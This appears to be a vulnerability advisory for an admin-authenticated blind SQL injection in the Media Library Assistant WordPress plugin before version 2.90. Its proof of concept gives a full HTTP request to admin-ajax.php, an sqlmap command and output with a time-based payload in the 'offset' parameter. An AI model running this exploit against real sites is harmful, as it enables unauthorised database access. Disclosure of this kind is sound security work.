WordPress Plugin Vulnerabilities

Media Library Assistant < 2.90 - Authenticated Blind SQL Injection

Description

The Media Library Assistant WordPress plugin was affected by an authenticated (admin+) blind SQL injection vulnerability when there is at least one Custom Field Rule set in the plugin's options.

Proof of Concept

There need to be at least one Custom Field Rule in the plugin Custom Fields settings (/wp-admin/options-general.php?page=mla-settings-menu-custom_field&mla_tab=custom_field)

Login as admin, and get the mla_admin_nonce parameter from /wp-admin/options-general.php?page=mla-settings-menu-general

Then, save the request below in a file and replacing the admin cookies as well as nonce parameter by their values

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 122
Connection: close
Cookie: [Admin Cookies]

offset=1&length=2&mla_admin_nonce=[NONCE]&bulk_action=custom-field-options-map&action=mla-inline-mapping-custom-scripts


$ sqlmap -r sqlmap.txt --level 5 -p offset --risk 3 --technique T --dbms MYSQL

[...]
sqlmap identified the following injection point(s) with a total of 921 HTTP(s) requests:
---
Parameter: offset (POST)
    Type: time-based blind
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: offset=1 PROCEDURE ANALYSE(EXTRACTVALUE(3522,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x67547748))))),1)-- KPiD&length=2&mla_admin_nonce=1a45dd5fb9&bulk_action=custom-field-options-map&action=mla-inline-mapping-custom-scripts
---